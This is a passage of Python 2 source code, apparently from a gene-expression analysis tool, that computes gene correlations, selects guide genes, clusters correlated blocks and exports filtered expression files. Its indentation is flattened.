print_out = '%d genes, differentially expressed %d fold for at least %d samples' % (len(expressed_values), fold, samplesDiffering*2)
return print_out, filtered_file
if len(expressed_values)<1400 and column_method == 'hopach':
row_method = 'hopach'; row_metric = 'correlation'
else:
row_method = 'weighted'; row_metric = 'cosine'
if amplifyGenes:
transpose = parameters
try:
if len(parameters.GeneSelection())>0:
parameters.setGeneSelection(parameters.GeneSelection()+' amplify')
print 'Finding correlated genes to the input geneset(s)...'
else:
print 'Finding intra-correlated genes from the input geneset(s)...'
parameters.setGeneSelection(parameters.GeneSelection()+' IntraCorrelatedOnly amplify')
except Exception:
parameters.setGeneSelection(parameters.GeneSelection()+' IntraCorrelatedOnly amplify')
print 'Finding intra-correlated genes from the input geneset(s)...'
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
#return graphic_links
from visualization_scripts import clustering
matrix, column_header, row_header, dataset_name, group_db = clustering.importData(graphic_links[-1][-1][:-4]+'.txt')
headers = ['UID']+column_header
expressed_values2={}
for i in row_header: ### Filter the expressed values for the intra-correlated queried gene set and replace
try: expressed_values2[i]=expressed_values[i]
except Exception:
try:
e = symbol_to_gene[i][0]
expressed_values2[e]=expressed_values[e]
except Exception:
pass
expressed_values = expressed_values2
print 'Looking for common gene expression profiles for class assignment...',
begin_time = time.time()
useNumpyCorr=True
negative_rho = rho_cutoff*-1
#results_file = string.replace(expFile[:-4]+'-CORRELATED-FEATURES.txt','exp.','/SamplePrediction/')
#eo = export.ExportFile(results_file[:-4]+'-genes.txt')
if useNumpyCorr:
row_ids=[]
x = []
for id in expressed_values:
row_ids.append(id)
x.append(expressed_values[id])
#if id== 'Bcl2l11': print expressed_values[id];sys.exit()
D1 = numpy.corrcoef(x)
print 'initial correlations obtained'
i=0
correlated_genes={}
if 'exons' == platform or 'PSI' == platform:
for score_ls in D1:
proceed = True
correlated = []
geneID = row_ids[i]
refgene = string.split(geneID,':')[0]
k=0
if excludeGuides!=None:
if geneID in excludeGuides: ### skip this main event
proceed=False
i+=1 ### keep the row index aligned with D1 before skipping this excluded guide
continue
for v in score_ls:
if v>rho_cutoff:# or v<negative_rho:
if refgene not in row_ids[k]:
correlated.append((v,row_ids[k]))
if excludeGuides!=None:
if row_ids[k] in excludeGuides: ### skip this main event
proceed=False
break
k+=1
correlated.sort()
if LegacyMode == False:
correlated.reverse()
if proceed:
correlated = map(lambda x:x[1],correlated)
correlated_genes[geneID] = correlated
i+=1
else:
for score_ls in D1:
correlated = []
geneID = row_ids[i]
k=0; temp=[]
for v in score_ls:
if v>rho_cutoff:# or v<negative_rho:
#scores.append((v,row_ids[k]))
correlated.append((v,row_ids[k]))
#temp.append((geneID,row_ids[k],str(v)))
k+=1
correlated.sort()
if LegacyMode == False:
correlated.reverse()
correlated = map(lambda x:x[1],correlated)
if len(correlated)>0:
correlated_genes[geneID] = correlated
#for (a,b,c) in temp: eo.write(a+'\t'+b+'\t'+c+'\n')
i+=1
else:
### Find common patterns now
performAllPairwiseComparisons = True
if performAllPairwiseComparisons:
correlated_genes = intraCorrelation(expressed_values,mlp)
print len(correlated_genes), 'highly correlated genes found for downstream clustering.'
else: correlated_genes={}
atleast_10={}
if len(correlated_genes)<70: connections = 0
elif len(correlated_genes)<110: connections = 4
else: connections = 5
numb_corr=[]
for i in correlated_genes:
if len(correlated_genes[i])>connections:
numb_corr.append([len(correlated_genes[i]),i])
atleast_10[i]=correlated_genes[i] ### if at least 10 genes are part of this pattern
x=0
for k in correlated_genes[i]:
if x<30: ### cap it at 30
try: atleast_10[k]=correlated_genes[k] ### add all correlated keys and values
except Exception: pass
elif k not in atleast_10:
ADT_status = check_for_ADT(k)
if ADT_status:
try: atleast_10[k]=correlated_genes[k] ### add all correlated keys and values
except Exception: pass
x+=1
if len(atleast_10)<30:
print 'Initial correlated set too small, getting anything correlated'
for i in correlated_genes:
if len(correlated_genes[i])>0:
numb_corr.append([len(correlated_genes[i]),i])
try: atleast_10[i]=correlated_genes[i] ### if at least 10 genes are part of this pattern
except Exception: pass
for k in correlated_genes[i]:
try: atleast_10[k]=correlated_genes[k] ### add all correlated keys and values
except Exception: pass
if len(atleast_10) == 0:
atleast_10 = expressed_values
#eo.close()
print len(atleast_10), 'genes correlated to multiple other members (initial filtering)'
### go through the list from the most linked to the least linked genes, only reported the most linked partners
if len(atleast_10)>5000:
print '\n'
print_out = '%d genes, differentially expressed %d fold for at least %d samples' % (len(expressed_values), fold, samplesDiffering*2) ### mirrors the summary built in the reportOnly branch; print_out was otherwise undefined here
return print_out,atleast_10
removeOutlierDrivenCorrelations=True
exclude_corr=[]
numb_corr.sort(); numb_corr.reverse()
numb_corr2=[]
#print len(numb_corr)
if removeOutlierDrivenCorrelations and samplesDiffering != 1:
for key in numb_corr: ### key gene
associations,gene = key
temp_corr_matrix_db={}; rows=[]; temp_corr_matrix=[]
gene_exp_vals = list(expressed_values[gene]) ### copy the list
max_index = gene_exp_vals.index(max(gene_exp_vals))
del gene_exp_vals[max_index]
#temp_corr_matrix.append(exp_vals); rows.append(gene)
#if 'ENSG00000016082' in correlated_genes[gene] or 'ENSG00000016082' == gene: print gene_to_symbol_db[gene],associations
if gene not in exclude_corr:
#print len(correlated_genes[gene])
for k in correlated_genes[gene]:
exp_vals = list(expressed_values[k]) ### copy the list
#print exp_vals
del exp_vals[max_index]
#temp_corr_matrix.append(exp_vals); rows.append(gene)
#print exp_vals,'\n'
temp_corr_matrix_db[k]=exp_vals
temp_corr_matrix.append(exp_vals); rows.append(gene)
correlated_hits = pearsonCorrelations(gene_exp_vals,temp_corr_matrix_db)
try: avg_corr = numpyCorrelationMatrix(temp_corr_matrix,rows,gene)
except Exception: avg_corr = 0
#if gene_to_symbol_db[gene][0] == 'ISL1' or gene_to_symbol_db[gene][0] == 'CD10' or gene_to_symbol_db[gene][0] == 'POU3F2':
if len(correlated_hits)>0:
if LegacyMode:
if (float(len(correlated_hits))+1)/len(correlated_genes[gene])<0.5 or avg_corr<rho_cutoff: ### compare to the below
pass
else:
numb_corr2.append([len(correlated_hits),gene])
else:
if (float(len(correlated_hits))+1)/len(correlated_genes[gene])<0.5 or avg_corr<(rho_cutoff-0.1):
#exclude_corr.append(key)
#if gene == 'XXX': print len(correlated_hits),len(correlated_genes[gene]), avg_corr, rho_cutoff-0.1
pass
else:
numb_corr2.append([len(correlated_hits),gene])
#print (float(len(correlated_hits))+1)/len(correlated_genes[gene]), len(correlated_genes[gene]), key
numb_corr = numb_corr2
numb_corr.sort(); numb_corr.reverse()
#print len(numb_corr)
exclude_corr={}; new_filtered_set={}
limit=0
for key in numb_corr: ### key gene
associations,gene = key
#if 'ENSG00000016082' in correlated_genes[gene] or 'ENSG00000016082' == gene: print gene_to_symbol_db[gene],associations
if gene not in exclude_corr:
for k in correlated_genes[gene]:
exclude_corr[k]=[]
new_filtered_set[k]=[]
new_filtered_set[gene]=[]
limit+=1
#print key
#if limit==1: break
atleast_10 = new_filtered_set
addMultipleDrivers=True
if len(guide_genes)>0 and addMultipleDrivers: ### Artificially weight the correlated genes with known biological drivers
for gene in guide_genes:
y=1
while y<2:
if y==1:
try: atleast_10[gene]=expressed_values[gene]
except Exception: break
else:
try: atleast_10[gene+'-'+str(y)]=expressed_values[gene]
except Exception: break
expressed_values[gene+'-'+str(y)]=expressed_values[gene] ### Add this new ID to the database
#print gene+'-'+str(y)
y+=1
#atleast_10 = expressed_values
results_file = string.replace(expFile[:-4]+'-CORRELATED-FEATURES.txt','exp.','/SamplePrediction/')
writeFilteredFile(results_file,platform,headers,gene_to_symbol_db,expressed_values,atleast_10)
print len(atleast_10),'final correlated genes'
end_time = time.time()
print 'Initial clustering completed in',int(end_time-begin_time),'seconds'
results_file = string.replace(expFile[:-4]+'-CORRELATED-FEATURES.txt','exp.','/SamplePrediction/')
if len(atleast_10)<1200 and column_method == 'hopach':
row_method = 'hopach'; row_metric = 'correlation'
else:
if LegacyMode:
row_method = 'average'; row_metric = 'euclidean'
else:
row_method = 'weighted'; row_metric = 'cosine'
#print row_method, row_metric
correlateByArrayDirectly = False
if correlateByArrayDirectly:
from visualization_scripts import clustering
matrix, column_header, row_header, dataset_name, group_db = clustering.importData(results_file)
new_column_header = map(lambda x: int(x[5:]),column_header)
matrix = [new_column_header]+matrix
matrix = zip(*matrix) ### transpose
exp_sample_db={}
for sample_data in matrix:
exp_sample_db[sample_data[0]] = sample_data[1:]
correlated_arrays = intraCorrelation(exp_sample_db,mlp)
print len(correlated_arrays), 'highly correlated arrays from gene subsets.'
mimum_corr_arrays={}
for i in correlated_arrays:
if len(correlated_arrays[i])>1:
linked_lists=correlated_arrays[i]+[i]
for k in correlated_arrays[i]:
linked_lists+=correlated_arrays[k]
linked_lists = unique.unique(linked_lists)
linked_lists.sort()
# print len(linked_lists), linked_lists
else:
try:
from visualization_scripts import clustering
if platform == 'exons': color_gradient = 'yellow_black_blue'
transpose = False
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors (possibly outside of LegacyMode)
graphic_links = clustering.runHCexplicit(results_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
if len(graphic_links)==0:
graphic_links = clustering.runHCexplicit(results_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
cluster_file = string.replace(graphic_links[0][1],'.png','.txt')
except Exception: pass
#exportGroupsFromClusters(cluster_file,expFile,platform)
#"""
#filtered_file = export.findParentDir(expFile)+'/amplify/'+export.findFilename(expFile)
#graphic_links = [(1,'/Users/saljh8/Desktop/Grimes/KashishNormalization/test/ExpressionInput/SamplePrediction/DataPlots/Clustering-CombinedSingleCell_March_15_2015-CORRELATED-FEATURES-hierarchical_cosine_euclidean.txt')]
try: graphic_links,new_results_file = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,graphics=graphic_links,ColumnMethod=column_method)
except Exception: print traceback.format_exc()
row_metric = 'correlation'; row_method = 'hopach'
#column_metric = 'cosine'
#if LegacyMode: column_method = 'hopach'
cellCycleRemove1=[]; cellCycleRemove2=[]
try:
newDriverGenes1, cellCycleRemove1 = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',stringency='strict',numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,ColumnMethod=column_method)
newDriverGenes1_str = 'Guide1 '+string.join(newDriverGenes1.keys(),' ')+' amplify positive'
parameters.setGeneSelection(newDriverGenes1_str) ### force correlation to these targetGenes
parameters.setGeneSet('None Selected') ### silence this
parameters.setPathwaySelect('None Selected')
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, parameters, display=False, Normalize=True)
newDriverGenes2, cellCycleRemove2 = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',stringency='strict',numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,ColumnMethod=column_method)
newDriverGenes2_str = 'Guide2 '+string.join(newDriverGenes2.keys(),' ')+' amplify positive'
parameters.setGeneSelection(newDriverGenes2_str) ### force correlation to these targetGenes
parameters.setGeneSet('None Selected') ### silence this
parameters.setPathwaySelect('None Selected')
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, parameters, display=False, Normalize=True)
newDriverGenes3 = unique.unique(newDriverGenes1.keys()+newDriverGenes2.keys())
cellCycleRemove=cellCycleRemove1+cellCycleRemove2 ### It is possible for a cell cycle guide-gene to be reported in both guide1 and 2, but only as cell cycle associated in one of them
newDriverGenes3_filtered=[]
for i in newDriverGenes3:
if not i in cellCycleRemove:
newDriverGenes3_filtered.append(i)
newDriverGenes3_str = 'Guide3 '+string.join(newDriverGenes3_filtered,' ')+' amplify positive'
parameters.setGeneSelection(newDriverGenes3_str)
try:
parameters.setClusterGOElite('BioMarkers')
"""
if species == 'Mm' or species == 'Hs' or species == 'Rn':
parameters.setClusterGOElite('BioMarkers')
else:
parameters.setClusterGOElite('GeneOntology')
"""
except Exception, e:
print e
graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, parameters, display=False, Normalize=True)
except Exception:
print traceback.format_exc()
try: copyICGSfiles(expFile,graphic_links)
except Exception: pass
return graphic_links,len(atleast_10)
def copyICGSfiles(expFile,graphic_links):
if 'ExpressionInput' in expFile:
root_dir = string.split(expFile,'ExpressionInput')[0]
else:
root_dir = string.split(expFile,'AltResults')[0]
destination_folder = root_dir+'/ICGS'
try: os.mkdir(destination_folder)
except Exception: pass
for (order,png) in graphic_links:
file = export.findFilename(png)
txt = string.replace(file,'.png','.txt')
pdf = string.replace(file,'.png','.pdf')
dest_png = destination_folder+'/'+file
dest_txt = destination_folder+'/'+txt
dest_pdf = destination_folder+'/'+pdf
shutil.copy(png, dest_png)
shutil.copy(png[:-4]+'.txt', dest_txt)
shutil.copy(png[:-4]+'.pdf', dest_pdf)
def pearsonCorrelations(ref_gene_exp,exp_value_db):
correlated=[]
for gene in exp_value_db:
rho,p = stats.pearsonr(ref_gene_exp,exp_value_db[gene])
if rho>rho_cutoff or rho<(rho_cutoff*-1):
if rho!= 1:
correlated.append(gene)
#print len(exp_value_db),len(correlated);sys.exit()
return correlated
def numpyCorrelationMatrix(x,rows,gene):
D1 = numpy.corrcoef(x)
gene_correlations={}
i=0
scores = []
for score_ls in D1:
for v in score_ls:
scores.append(v)
return numpy.average(scores)
def numpyCorrelationMatrixCount(x,rows,cutoff=0.4,geneTypeReport=None):
### Find which genes are most correlated
D1 = numpy.corrcoef(x)
gene_correlation_counts={}
i=0
for score_ls in D1:
correlated_genes=[]
geneID = rows[i]
k=0; genes_to_report=[]
for rho in score_ls:
if rho>cutoff:
correlated_genes.append(rows[k])
if rows[k] in geneTypeReport:
genes_to_report.append(rows[k])
k+=1
gene_correlation_counts[geneID]=len(correlated_genes),genes_to_report
i+=1
return gene_correlation_counts
def numpyCorrelationMatrixGene(x,rows,gene):
D1 = numpy.corrcoef(x)
gene_correlations={}
i=0
for score_ls in D1:
scores = []
geneID = rows[i]
k=0
for v in score_ls:
scores.append((v,rows[k]))
k+=1
scores.sort()
gene_correlations[geneID] = scores
i+=1
correlated_genes={}
rho_values = map(lambda (r,g): r,gene_correlations[gene])
genes = map(lambda (r,g): g,gene_correlations[gene])
s1 = bisect.bisect_right(rho_values,rho_cutoff)
s2 = bisect.bisect_left(rho_values,-1*rho_cutoff)
correlated = genes[:s2]+genes[s1:] ### combine the negatively (below -rho_cutoff) and positively (above rho_cutoff) correlated genes
#print len(rows), len(correlated);sys.exit()
return len(correlated)/len(rows)
def numpyCorrelationMatrixGeneAlt(x,rows,genes,gene_to_symbol,rho_cutoff):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=RuntimeWarning) ### hides import warnings
D1 = numpy.ma.corrcoef(x)
i=0
gene_correlations={}
for score_ls in D1:
scores = []
try: symbol = gene_to_symbol[rows[i]][0]
except Exception: symbol = '$'
if rows[i] in genes or symbol in genes:
k=0
for v in score_ls:
if str(v)!='nan':
if v > rho_cutoff:
uid = rows[k]
if uid in gene_to_symbol: uid = gene_to_symbol[uid][0]
scores.append((v,uid))
k+=1
scores.sort()
scores.reverse()
scores = map(lambda x: x[1], scores[:140]) ### grab the top 140 correlated gene symbols only
if len(symbol)==1: symbol = rows[i]
gene_correlations[symbol] = scores
i+=1
return gene_correlations
def genericRowIDImport(filename):
id_list=[]
for line in open(filename,'rU').xreadlines():
uid = string.split(line,'\t')[0]
if ' ' in uid:
for id in string.split(uid,' '):
id_list.append(id)
else:
id_list.append(uid)
return id_list
def writeFilteredFileReimport(expFile,platform,headers,expressed_values):
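### Write a '-VarGenes.txt' copy of the expression file restricted to the retained variable features, log2(x+1)-transforming
### values when non-log RNASeq data was detected, and copy the matching groups file alongside it.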
filtered_file=expFile[:-4]+'-VarGenes.txt'
groups_file = string.replace(expFile,'exp.','groups.')
filtered_groups = string.replace(filtered_file,'exp.','groups.')
try: shutil.copy(groups_file,filtered_groups)
except: pass
eo = export.ExportFile(filtered_file)
eo.write(headers)
for line in open(expFile,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
uid = t[0]
if uid in expressed_values:
if platform=='RNASeq': ### set to RNASeq when non-log2 data detected
values = t[1:]
try: values = map(lambda x: math.log(float(x)+1,2),values)
except Exception:
if 'NA' in values:
values = [0 if x=='NA' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
elif '' in values:
values = [0 if x=='' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
values = map(str,values)
eo.write(string.join([uid]+values,'\t')+'\n')
else:
eo.write(line)
eo.close()
return filtered_file
def writeFilteredFile(results_file,platform,headers,gene_to_symbol_db,expressed_values,atleast_10,excludeGenes=[]):
eo = export.ExportFile(results_file)
try: headers = string.replace(headers,'row_clusters-flat','UID')
except Exception:
headers = string.join(headers,'\t')+'\n'
headers = string.replace(headers,'row_clusters-flat','UID')
eo.write(headers)
keep=[]; sort_genes=False
e=0
if len(atleast_10)==0:
atleast_10 = expressed_values
sort_genes = True
for i in atleast_10:
if i in gene_to_symbol_db:
symbol = gene_to_symbol_db[i][0]
else: symbol = i
if i not in excludeGenes and symbol not in excludeGenes:
if i not in keep:
keep.append((symbol,i))
if sort_genes:
keep.sort(); keep.reverse()
for (symbol,i) in keep:
"""
if platform == 'RNASeq':
values = map(lambda x: logTransform(x), expressed_values[i])
else:
"""
values = map(str,expressed_values[i])
eo.write(string.join([symbol]+values,'\t')+'\n')
e+=1
eo.close()
def remoteGetDriverGenes(Species,platform,results_file,numSamplesClustered=3,excludeCellCycle=False,ColumnMethod='hopach'):
global species
species = Species
guideGenes, cellCycleRemove = correlateClusteredGenes(platform,results_file,stringency='strict',excludeCellCycle=excludeCellCycle,ColumnMethod=ColumnMethod)
guideGenes = string.join(guideGenes.keys(),' ')+' amplify positive'
return guideGenes
def correlateClusteredGenes(platform,results_file,stringency='medium',numSamplesClustered=3,
excludeCellCycle=False,graphics=[],ColumnMethod='hopach',rhoCutOff=0.2, transpose=False,
includeMoreCells=False):
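### Post-clustering filter: at 'medium' stringency, collect rows passing several rho/complexity passes into a '-filtered.txt'
### file and re-cluster it; at 'strict' stringency, select one representative guide gene per correlated block instead.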
if numSamplesClustered<1: numSamplesClustered=1
### Get all highly variable but low complexity differences, typically one or two samples that are really different
if stringency == 'medium':
new_results_file = string.replace(results_file,'.txt','-filtered.txt')
new_results_file = string.replace(new_results_file,'.cdt','-filtered.txt')
eo = export.ExportFile(new_results_file)
medVarHighComplexity=[]; medVarLowComplexity=[]; highVarHighComplexity=[]; highVarLowComplexity=[]
if transpose==False or includeMoreCells:
medVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=3,hits_to_report=6,transpose=transpose)
medVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.1,hits_cutoff=3,hits_to_report=6,transpose=transpose) #hits_cutoff=6
highVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.5,hits_cutoff=1,hits_to_report=4,transpose=transpose)
highVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.2,hits_cutoff=1,hits_to_report=6,filter=True,numSamplesClustered=numSamplesClustered,transpose=transpose)
else:
highVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.5,hits_cutoff=1,hits_to_report=4,transpose=transpose)
#combined_results = dict(medVarLowComplexity.items() + medVarLowComplexity.items() + highVarLowComplexity.items() + highVarHighComplexity.items())
combined_results={}
for i in medVarLowComplexity: combined_results[i]=[]
for i in medVarHighComplexity: combined_results[i]=[]
for i in highVarLowComplexity: combined_results[i]=[]
for i in highVarHighComplexity: combined_results[i]=[]
#combined_results = highVarHighComplexity
if stringency == 'strict':
medVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=4,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered)
medVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.1,hits_cutoff=4,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered) #hits_cutoff=6
highVarLowComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.5,hits_cutoff=3,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered)
highVarHighComplexity, column_header = correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=3,hits_to_report=50,filter=True,numSamplesClustered=numSamplesClustered)
#combined_results = dict(medVarLowComplexity.items() + medVarLowComplexity.items() + highVarLowComplexity.items() + highVarHighComplexity.items())
combined_results={}
for i in medVarLowComplexity: combined_results[i]=[]
for i in medVarHighComplexity: combined_results[i]=[]
for i in highVarLowComplexity: combined_results[i]=[]
for i in highVarHighComplexity: combined_results[i]=[]
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=rhoCutOff,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle)
if guideGenes == 'TooFewBlocks':
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=rhoCutOff+0.1,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle)
if guideGenes == 'TooFewBlocks':
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=rhoCutOff+0.2,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle,forceOutput=True)
if len(guideGenes)>200:
print 'Too many guides selected (>200)... performing more stringent filtering...'
guideGenes, addition_cell_cycle_associated = correlateClusteredGenesParameters(results_file,rho_cutoff=0.1,hits_cutoff=0,hits_to_report=1,geneFilter=combined_results,excludeCellCycle=excludeCellCycle,restrictTFs=True)
return guideGenes, addition_cell_cycle_associated
#B4galt6, Prom1
for tuple_ls in combined_results:
data_length = len(tuple_ls);break
if data_length == len(column_header):
eo.write(string.join(column_header,'\t')+'\n')
else:
eo.write(string.join(['UID']+column_header,'\t')+'\n')
#combined_results = highVarHighComplexity
for tuple_ls in combined_results:
eo.write(string.join(list(tuple_ls),'\t')+'\n')
eo.close()
cluster = True
if cluster == True and transpose==False:
from visualization_scripts import clustering
if ColumnMethod == 'hopach':
row_method = 'hopach'
column_method = 'hopach'
else:
column_method = ColumnMethod
row_method = 'average'
row_metric = 'correlation'
column_metric = 'cosine'
color_gradient = 'yellow_black_blue'
if platform == 'exons': color_gradient = 'yellow_black_blue'
transpose = False
try:
len(guide_genes)
except Exception:
guide_genes = []
graphics = clustering.runHCexplicit(new_results_file, graphics, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
cluster_file = string.replace(graphics[0][1],'.png','.txt')
#exportGroupsFromClusters(cluster_file,expFile,platform)
return graphics, new_results_file
def exportReDefinedClusterBlocks(results_file,block_db,rho_cutoff):
### Re-import the matrix to get the column cluster IDs
matrix, column_header, row_header, dataset_name, group_db, priorColumnClusters, priorRowClusters = clustering.remoteImportData(results_file)
new_block_db = {}
centroid_blocks=[]
centroids = []
for block in block_db:
if len(block_db[block])>3:
new_block_db[block] = block_db[block] ### Keep track of the row_header indexes associated with each block
data = map(lambda x: matrix[x],block_db[block])
### Compute an expression centroid from the block (cluster)
centroid = [float(sum(col))/len(col) for col in zip(*data)]
centroids.append(centroid)
centroid_blocks.append(block)
### Compare block centroids
D1 = numpy.corrcoef(centroids)
i=0
correlated_blocks=[]
for score_ls in D1:
scores = []
block = centroid_blocks[i]
k=0
for v in score_ls:
if str(v)!='nan' and v>0.6:
if block !=centroid_blocks[k]:
blocks = [block,centroid_blocks[k]]
blocks.sort()
if blocks not in correlated_blocks:
correlated_blocks.append(blocks)
k+=1
i+=1
newBlock=0
existing=[]
updated_blocks={}
correlated_blocks.sort()
print correlated_blocks
### Build a tree of related blocks (based on the code in junctionGraph)
for (block1,block2) in correlated_blocks:
if block1 not in existing and block2 not in existing:
newBlock=newBlock+1
updated_blocks[newBlock]=[block1,]
updated_blocks[newBlock].append(block2)
existing.append(block1)
existing.append(block2)
elif block1 in existing and block2 not in existing:
for i in updated_blocks:
if block1 in updated_blocks[i]:
updated_blocks[i].append(block2)
existing.append(block2)
elif block2 in existing and block1 not in existing:
for i in updated_blocks:
if block2 in updated_blocks[i]:
updated_blocks[i].append(block1)
existing.append(block1)
elif block1 in existing and block2 in existing:
for i in updated_blocks:
if block1 in updated_blocks[i]:
b1=i
if block2 in updated_blocks[i]:
b2=i
if b1!=b2:
for b in updated_blocks[b2]:
if b not in updated_blocks[b1]:
updated_blocks[b1].append(b)
del updated_blocks[b2]
### Add blocks not correlated to other blocks (not in correlated_blocks)
#print len(existing),len(centroid_blocks)
print updated_blocks
for block in centroid_blocks:
if block not in existing:
newBlock+=1
updated_blocks[newBlock]=[block]
import collections
row_order = collections.OrderedDict()
for newBlock in updated_blocks:
events_in_block=0
for block in updated_blocks[newBlock]:
for i in new_block_db[block]:
events_in_block+=1
if events_in_block>5:
for block in updated_blocks[newBlock]:
for i in new_block_db[block]:
row_order[i] = newBlock ### i is a row_header index - row_header[i] is a UID
#if newBlock==3:
#if row_header[i]=='TAF2&ENSG00000064313&E9.1-I9.1_120807184__ENSG00000064313&E9.1-E10.1':
#print row_header[i]
print updated_blocks
### Non-clustered block results - Typically not used but good to refer back to when testing
original_block_order = collections.OrderedDict()
for block in new_block_db:
for i in new_block_db[block]:
original_block_order[i]=block
#row_order = original_block_order
### Export the results
row_header.reverse() ### Reverse order is the default
priorColumnClusters = map(str,priorColumnClusters)
new_results_file = results_file[:-4]+'-BlockIDs.txt'
eo = export.ExportFile(new_results_file)
eo.write(string.join(['UID','row_clusters-flat']+column_header,'\t')+'\n')
eo.write(string.join(['column_clusters-flat','']+priorColumnClusters,'\t')+'\n')
for i in row_order:
cluster_number = str(row_order[i])
uid = row_header[i]
values = map(str,matrix[i])
eo.write(string.join([uid,cluster_number]+values,'\t')+'\n')
eo.close()
print 'Filtered, grouped expression clusters exported to:',new_results_file
def correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=4,hits_to_report=5,
filter=False,geneFilter=None,numSamplesClustered=3,excludeCellCycle=False,restrictTFs=False,
forceOutput=False,ReDefinedClusterBlocks=False,transpose=False):
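### Walk down the clustered matrix row by row, grouping consecutive rows whose pairwise rho exceeds rho_cutoff into blocks;
### with hits_to_report==1 a single guide gene (preferring non-cell-cycle TFs) is chosen per block, otherwise the top
### hits_to_report rows of each sufficiently large block are returned.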
from visualization_scripts import clustering
addition_cell_cycle_associated=[]
if geneFilter != None:
geneFilter_db={}
for i in geneFilter:
geneFilter_db[i[0]]=[]
geneFilter=geneFilter_db
matrix, column_header, row_header, dataset_name, group_db = clustering.importData(results_file,geneFilter=geneFilter)
if transpose: ### If performing reduce cluster heterogeneity on cells rather than on genes
#print 'Transposing matrix'
matrix = map(numpy.array, zip(*matrix)) ### transpose the matrix; each resulting row becomes a numpy array
column_header, row_header = row_header, column_header
Platform = None
ADTs=[]
for i in row_header:
if 'ENS' in i and '-' in i and ':' in i: Platform = 'exons'
else:
ADT_status = check_for_ADT(i)
if ADT_status: ADTs.append(i)
print ADTs
#print hits_to_report
if hits_to_report == 1:
### Select the best gene using correlation counts and TFs
try:
from import_scripts import OBO_import; import ExpressionBuilder
gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
symbol_to_gene = OBO_import.swapKeyValues(gene_to_symbol_db)
try: TFs = importGeneSets('Biotypes',filterType='transcription regulator',geneAnnotations=gene_to_symbol_db)
except Exception: TFs = importGeneSets('BioTypes',filterType='transcription regulator',geneAnnotations=gene_to_symbol_db)
if excludeCellCycle == True or excludeCellCycle == 'strict':
try: cell_cycle = importGeneSets('KEGG',filterType='Cell cycle:',geneAnnotations=gene_to_symbol_db)
except Exception:
cell_cycle = {}
try: cell_cycle_go = importGeneSets('GeneOntology',filterType='GO:0022402',geneAnnotations=gene_to_symbol_db)
except Exception: cell_cycle_go={}
for i in cell_cycle_go:
cell_cycle[i]=[]
print len(cell_cycle),'cell cycle genes being considered.'
else:
cell_cycle={}
except Exception:
print traceback.format_exc()
symbol_to_gene={}; TFs={}; cell_cycle={}
gene_corr_counts = numpyCorrelationMatrixCount(matrix,row_header,cutoff=0.4,geneTypeReport=TFs)
#try: column_header = map(lambda x: string.split(x,':')[1],column_header[1:])
#except Exception: column_header = column_header[1:]
i=0
block=0
if ReDefinedClusterBlocks:
import collections
block_db=collections.OrderedDict() ### seems benign but could alter legacy results
else:
block_db={}
for row in matrix:
if i!=0:
rho,p = stats.pearsonr(row,matrix[i-1]) ### correlate to the last ordered row
#if row_header[i] == 'Pax6': print [block],row_header[i-1],rho,rho_cutoff
"""
try:
if row_header[i] in guide_genes: print row_header[i], rho
if row_header[i-1] in guide_genes: print row_header[i-1], rho
if row_header[i+1] in guide_genes: print row_header[i+1], rho
except Exception:
pass
"""
#if hits_to_report == 1: print [block],row_header[i], row_header[i-1],rho,rho_cutoff
#print rho
if rho>0.95:
pass ### don't store this
elif rho>rho_cutoff:
try:
block_db[block].append(i) ### store the row index
except Exception:
block_db[block] = [i] ### store the row index
else:
block+=1
block_db[block] = [i] ### store the row index
else:
